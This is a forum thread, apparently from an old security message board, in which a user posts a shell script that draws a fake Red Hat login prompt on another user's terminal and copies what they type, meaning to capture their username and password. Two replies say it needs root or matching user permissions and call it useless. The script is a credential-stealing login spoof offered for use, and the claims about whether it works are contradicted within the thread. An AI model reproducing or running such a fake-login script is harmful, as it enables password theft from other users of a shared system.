Results 1 to 4 of 4

Thread: tty hacking (no.. seriously)

  1. #1

    tty hacking (no.. seriously)

    You might remember my last thread about tty hacking (http://www.antionline.com/showthread...hreadid=119753). It turned out that didnt work, -lol-. I got really frustrated because many dismissed it as impossible.
    There is no way to read back what the other person is typing unless you are the root user and have installed software specifically for that purpose
    . aghh! So i hacked around some more because i knew that it worked and i just came up with a foolproof (no pun intended) method. Here's the script (attacker at tty1, victim at tty2):

    #this cat is the big moma:
    cat /dev/tty2 >/dev/tty1&
    CATPID="$!"
    echo -ne >/dev/tty2 #misc commands that dont return anything
    true >/dev/tty2
    false >/dev/tty2
    locate dfdsfds >/dev/tty2
    locate otherHw >/dev/tty2
    #heres the meat:
    clear >/dev/tty2
    echo -ne '\n\nRed Hat Linux release 7.1 (Seawolf)\n' >/dev/tty2
    echo -ne 'Kernel 2.4.2-2 on an i686\n' >/dev/tty2
    echo -ne '\nlocalhost login: ' >/dev/tty2
    sleep 5
    #redraw the screen; bash at tty2 doesnt have a clue what is #going on, so it thinks $USER that the guy at tty2 entered is a #command:
    clear >/dev/tty2
    echo -ne '\n\nRed Hat Linux release 7.1 (Seawolf)\n' >/dev/tty2
    echo -ne 'Kernel 2.4.2-2 on an i686\n\n' >/dev/tty2
    echo -ne "localhost login: $USER\n" >/dev/tty2
    echo -ne 'Password: '>/dev/tty2
    #the stuff entered after password is the only thing thats #redirected
    sleep 5 #give him time to enter his ps
    kill -TERM $CATPID #so nothing else gets redirected

    Now, 'foolproof' meaning you will get text back after the user enters his username (for some reason, after the cat and misc commands are excecuted, the user at tty2 must enter a string followed by enter before text gets redirected to tty1; and thats just in time for the ps to be redirected!). Now this script is extremely crappy so dont feel stupid asking if you dont know why it's doing what it does. If i learn real scripting ill make a better one and put it on here. Cheers
    -Ryan

  2. #2
    Senior Member
    Join Date
    Nov 2001
    Posts
    1,255
    Great idea, however you need root access for this to work, and at that point you could just change the password....

    [chsh@comp chsh]$ cat /dev/tty2
    cat: /dev/tty2: Permission denied
    [chsh@comp chsh]$ su root
    Password:
    [root@comp chsh]# cat /dev/tty2
    <I CTRL+C'ed to cancel out after seeing no output>
    [root@comp chsh]#
    Chris Shepherd
    The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
    \"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
    Is your whole family retarded, or did they just catch it from you?

  3. #3
    Actually, you need to be the same user as the guy on tty2, or be in the group tty (i believe). But your sorta right that the hack is useless.

  4. #4
    Senior Member
    Join Date
    Nov 2001
    Posts
    1,255
    Originally posted by ryannh@prodigy.
    Actually, you need to be the same user as the guy on tty2, or be in the group tty (i believe). But your sorta right that the hack is useless.
    Right, but the idea here is to get rid of the login prompt and replace it with a fake. Only root can monitor the output of non-logged in ttys...

    At any rate, it IS useless.
    Chris Shepherd
    The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
    \"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
    Is your whole family retarded, or did they just catch it from you?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •